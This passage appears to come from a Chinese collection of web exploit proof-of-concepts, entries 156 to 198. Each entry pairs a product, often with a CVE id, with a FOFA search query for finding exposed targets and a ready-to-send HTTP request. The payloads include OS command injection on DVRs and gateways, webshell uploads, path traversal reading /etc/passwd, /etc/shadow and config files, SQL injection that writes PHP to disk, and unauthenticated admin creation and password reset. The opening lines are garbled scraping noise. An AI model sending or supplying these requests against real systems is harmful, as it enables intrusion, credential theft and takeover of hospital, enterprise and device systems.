-----------------------------qttl7vemrsold314zg0f--0 T8 B' w! ^& {$ k! l5 p
; k4 }: G+ P) F( m0 D
0 [7 T, T- [/ t, A8 t0 d! X4 U8 L2 X访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
$ e6 K' g) L% f* i$ r
" m5 o4 Y" }" v; W: v156. TBK DVR-4104/DVR-4216 操作系统命令注入' `5 } f# |' q) z) O
CVE-2024-3721- T1 ]6 h) v) H% p5 ]+ O
FOFA:"Location: /login.rsp". q6 M% T8 @2 Z1 G- e6 t) u# u
·TBK DVR-41042 v+ _# z! r( a2 F- l* Q2 a
·TBK DVR-4216
' n4 F6 J. ], D2 s- I( P! hcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"8 O4 N$ d" a4 V
- ?( R8 B) ` T0 V
, V% u. c/ v6 G5 W3 g/ P3 j7 k) h
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1# k" q4 W8 x6 m+ d2 x. ]; V
Host: x.x.x.x+ Z' f: @) v$ T4 N* E
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! x. G7 |+ Z6 R- r& |5 q# O! WConnection: close/ r- ?. f. a/ Q7 _. o, y& o
Content-Length: 0' i, T* g4 i9 L
Cookie: uid=1
) d4 N0 Q- H# ]Accept-Encoding: gzip
. O$ t! y; p) e! Y/ o0 l) l& W3 J+ _9 V# N) L& |+ L
157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) Picture Archiving and Communication System WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 fully intelligent parking fee collection system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 (Lean Value Management System) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 (telecom gateway configuration management system) rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical viewing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.
POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
